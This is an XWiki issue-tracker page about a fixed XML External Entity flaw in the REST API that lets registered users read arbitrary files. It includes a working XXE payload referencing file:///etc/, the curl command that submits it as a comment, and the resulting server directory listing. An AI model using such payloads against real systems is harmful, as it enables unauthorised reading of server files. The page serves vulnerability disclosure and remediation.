Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-7711

Arbitrary file read access by registered users using REST interface.

    XMLWordPrintable

Details

    • Bug
    • Resolution: Fixed
    • Major
    • 4.1-milestone-2, 4.0.1
    • 4.0-rc-1
    • REST
    • None
    • Unknown
    • n/a

    Description

      from an email I got:

      The XWiki REST API is vulnerable to an XML External Entity attack. This
      vulnerability allows at least to read any file and directory accessible
      to the user running the application. The following PoC will create a
      comment including a listing of the '/etc/' directory.
      
      * XML document (com.xml) :
      
      <!DOCTYPE comment [
      <!ENTITY bingo SYSTEM "file:///etc/">
      ]>
      <comment xmlns="http://www.xwiki.org">
          <text>This is a comment. Nothing fancy but -- &bingo; -- ...</text>
      </comment>
      
      * Call to the REST API :
      
      curl -u XXX:XXX -X POST -H "Content-type: application/xml" -H "Accept:
      application/xml" -d "@com.xml"
      "http://XXX/xwiki/rest/wikis/XXX/spaces/XXX/pages/XXX/comments"
      
      Regards,
      Nicolas Grégoire
      

      repeated:

      user@debo8:~$ curl -u user:passwd -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
      <?xml version="1.0" encoding="UTF-8" standalone="yes"?><comment xmlns="http://www.xwiki.org"><link rel="http://www.xwiki.org/rel/page" href="http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome"/><id>2</id><author>XWiki.user</author><date>2012-04-11T20:46:59.040-04:00</date><text>This is a comment. Nothing fancy but -- .java
      .pwd.lock
      acpi
      adduser.conf
      adjtime
      aliases
      alsa
      alternatives
      anacrontab
      apache2
      apm
      apt
      asound.names
      asound.state
      at.deny
      avahi
      bash_completion
      bash_completion.d
      bash.bashrc
      bindresvport.blacklist
      blkid.tab
      blkid.tab.old
      bluetooth
      bonobo-activation
      ca-certificates
      ca-certificates.conf
      ca-certificates.conf.dpkg-old
      calendar
      chatscripts
      chromium
      chromium-browser
      clutter-imcontext
      colord.conf
      compizconfig
      console
      ConsoleKit
      console-tools
      cron.d
      cron.daily
      cron.hourly
      cron.monthly
      cron.weekly
      crontab
      crypttab
      cups
      dbus-1
      debconf.conf
      debian_version
      default
      defoma
      deluser.conf
      dfs
      dhcp
      dhcp3
      dictionaries-common
      dkms
      dm
      dnsmasq.conf
      dnsmasq.conf.dpkg-old
      dnsmasq.d
      doc-base
      dpkg
      dumpasn1
      emacs
      email-addresses
      environment
      esound
      ethertypes
      exim4
      exports
      fam.conf
      festival.scm
      fonts
      foomatic
      fop.conf.d
      fstab
      fstab.d
      fuse.conf
      gai.conf
      gconf
      gdb
      gdm
      ghostscript
      gimp
      gnashpluginrc
      gnashrc
      gnome
      gnome-system-tools
      gnome-vfs-2.0
      gnome-vfs-mime-magic
      gre.d
      groff
      groovy
      group
      group-
      grub.d
      gshadow
      gshadow-
      gssapi_mech.conf
      gtk-2.0
      gtk-3.0
      gtkmathview
      hal
      hddtemp.db
      hdparm.conf
      hesiod.conf
      host.conf
      hostname
      hosts
      hosts.allow
      hosts.deny
      hp
      icedove
      icedtea-web
      iceweasel
      idmapd.conf
      ImageMagick
      inetd.conf
      init.d
      initramfs-tools
      inittab
      inputrc
      insserv
      insserv.conf
      insserv.conf.d
      iproute2
      irssi.conf
      issue
      issue.net
      java
      java-6-cacao
      java-6-openjdk
      java-6-sun
      javascript-common
      john
      kde3
      kernel
      kernel-img.conf
      kerneloops.conf
      kernel-pkg.conf
      keys
      kvm
      labrea
      ld.so.cache
      ld.so.conf
      ld.so.conf.d
      ldap
      libao.conf
      libaudit.conf
      libgda-3.0
      libpaper.d
      libreoffice
      libvirt
      lighttpd
      locale.alias
      locale.gen
      localtime
      logcheck
      login.defs
      logrotate.conf
      logrotate.d
      lsb-base
      lvm
      lynx-cur
      magic
      magic.mime
      mail.rc
      mailcap
      mailcap.order
      mailname
      manpath.config
      maven2
      menu
      menu-methods
      mercurial
      mime.types
      mke2fs.conf
      modprobe.d
      modules
      mono
      motd
      motd.tail
      mplayer
      mtab
      mtools.conf
      Muttrc
      Muttrc.d
      mysql
      nanorc
      netconfig
      netscsid.conf
      network
      NetworkManager
      networks
      nsswitch.conf
      obex-data-server
      openal
      OpenCL
      openoffice
      openvpn
      opt
      oss.conf
      pam.conf
      pam.d
      pango
      papersize
      passwd
      passwd-
      perl
      pm
      pnm2ppa.conf
      polipo
      polkit-1
      postgresql
      postgresql-common
      ppp
      prelink.conf
      profile
      profile.d
      protocols
      pulse
      purple
      python
      python2.5
      python2.6
      python2.7
      qemu-ifup
      rc.local
      rc0.d
      rc1.d
      rc2.d
      rc3.d
      rc4.d
      rc5.d
      rc6.d
      rcS.d
      rearj.cfg
      reportbug.conf
      resolv.conf
      resolvconf
      rmt
      rpc
      rsyslog.conf
      rsyslog.d
      samba
      sane.d
      sasl2
      screenrc
      securetty
      security
      selinux
      sensors.conf
      sensors.d
      sensors3.conf
      services
      sgml
      shadow
      shadow-
      shells
      skel
      smartd.conf
      smartmontools
      smi.conf
      snmp
      sound
      speech-dispatcher
      ssh
      ssl
      subversion
      sudoers
      sudoers.d
      sudoers.dpkg-dist
      sysconfig
      sysctl.conf
      sysctl.conf.dpkg-old
      sysctl.d
      systemd
      terminfo
      texmf
      timezone
      timidity
      tomcat5.5
      tor
      ts.conf
      tsocks.conf
      ucf.conf
      udev
      ufw
      updatedb.conf
      update-notifier
      UPower
      vde2
      velocity
      vga
      vim
      vpnc
      w3m
      wgetrc
      wildmidi
      wireshark
      wodim.conf
      wpa_supplicant
      X11
      xchat-systray
      xdg
      xen
      xml
      zfs
       -- ...</text><replyTo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:nil="true"/></comment>user@debo8:~$ 
      

      Not repeatable with guest user even if guest is allowed to comment.

      user@debo8:~$ curl -X POST -H "Content-type: application/xml" -H "Accept: application/xml" -d "@com.xml" "http://127.0.0.1:8080/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/comments"
      Error number 9001 in 9: Access denied in edit mode on document xwiki:Main.WebHomeuser@debo8:~$
      
      
      

      Attachments

        Issue Links

          Activity

            People

              calebjamesdelisle CalebJamesDeLisle
              calebjamesdelisle CalebJamesDeLisle
              Votes:
              0 Vote for this issue
              Watchers:
              0 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: